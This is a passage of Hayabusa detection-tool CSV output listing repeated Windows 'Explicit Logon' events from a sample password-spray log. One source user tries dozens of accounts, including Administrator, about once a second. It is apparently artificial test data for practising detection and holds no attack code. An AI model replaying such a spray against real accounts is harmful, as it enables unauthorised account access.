+09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:19.035 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:20.097 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:21.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:22.222 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:23.295 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:24.342 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:25.404 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:26.504 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:27.583 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:28.654 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:29.712 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:30.787 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:31.861 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:32.955 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:34.020 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:35.081 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:36.151 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:37.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:38.310 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:39.393 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:40.457 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:41.553 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:42.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:43.686 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:44.738 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:45.818 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:46.896 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:47.953 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:49.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:50.082 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:51.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:52.214 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:53.285 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:54.354 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:55.438 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:56.513 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:57.578 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:58.661 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:59.721 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:00.795 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:01.865 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:02.941 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:04.015 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:05.097 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:06.182 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:07.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:08.315 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:09.399 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:10.468 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:11.549 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:12.621 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:13.709 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:14.769 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:15.849 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:16.918 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:17.999 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:19.068 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:20.129 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:21.201 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:22.250 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:23.338 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:24.404 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:25.468 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:26.529 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:27.607 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:28.691 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:29.753 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:30.838 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:31.910 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:32.983 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:34.067 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:35.146 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:36.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:37.334 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:38.403 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:39.463 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:40.530 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:41.608 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:42.669 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:43.731 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:44.801 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:45.880 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:46.969 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:48.042 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: 
